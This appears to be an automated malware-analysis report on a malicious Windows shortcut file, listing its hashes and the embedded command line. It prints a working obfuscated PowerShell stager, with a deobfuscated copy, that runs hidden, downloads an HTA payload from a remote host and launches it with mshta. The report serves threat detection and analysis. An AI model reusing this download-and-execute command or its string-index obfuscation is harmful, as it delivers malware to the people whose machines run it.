Malicious
Characteristics
Hash      Hash Value
MD5       cfb48c2cab273fcebb11028b7ce449fa
SHA1      95a61938ea99ea740476d451d5c642e617292cf4
SHA256    e17f553220905c179fb636a60e8cac9b29f2fb67d41cf86d8cef8a7c24e5d936
SHA384    4a726773c12341831d328200b78e7c3e64207f7218f1fd7a9689aa94e5d73aa73ff5f3d9fde10a0bae8f3a0b1da73e27
SHA512    a43f9bd291bcb95bab15f02041b23ad50d6bd514eda1bcdc935911bbf44784bec21e67dc7ab096a02673973db5d98aaeed08284895ac8c778991907d456527f7
SSDeep    48:8/Haxwc+hlG7whpvjuw9drj0dDvB68DvBV:8/H4wLU7wntzEvBvvBV
TLSH      AA51191CBED50226E6A6EA35BCB66216E57E3B43E73E4D8D41C14284067201EB46DF2E
Artefacts
Name      Value
LNK: Command Execution

powershell.exe powershell -ep Bypass -w Hidden -c "$T='';$S='uslni.ry-hfat:ve/p';$i=@((-343+353),(255-242),(-425+438),(-196+214),(214-212),(-403+417),(-13+30),(355-338),(-83+93),(-24+36),(102-95),(-203+210),(399-391),(434-425),(-107+109),(-460+465),(328-315),(-347+363),(160-154),(-4+8),(-464+467),(-326+343),(-255+256),(441-436),(-250+263),(-89+104),(-292+304),(283-271),(-222+229),(8+5),(484-467),(-53+66),(-195+206),(-79+85),(-490+500),(-119+132),(212-200));foreach ($x in $i){$T+=$S[$x - 1]};iwr $T -OutFile $env:TEMP\a.hta; start mshta $env:TEMP\a.hta"

Deobfuscated PowerShell

$T = ""
$S = "uslni.ry-hfat:ve/p"
$i = @(10, 13, 13, 18, 2, 14, 17, 17, 10, 12, 7, 7, 8, 9, 2, 5, 13, 16, 6, 4, 3, 17, 1, 5, 13, 15, 12, 12, 7, 13, 17, 13, 11, 6, 10, 13, 12)
foreach ($x in $i) { $T += $S[$x - 1] }
Invoke-WebRequest $T -OutFile $env:TEMP\a.hta
start "mshta" $env:TEMP\a.hta

cfb48c2cab273fcebb11028b7ce449fa (2.91 KB)
No malware configuration was found at this point.
cfb48c2cab273fcebb11028b7ce449fa > LNK CommandLine > [PowerShell Command]
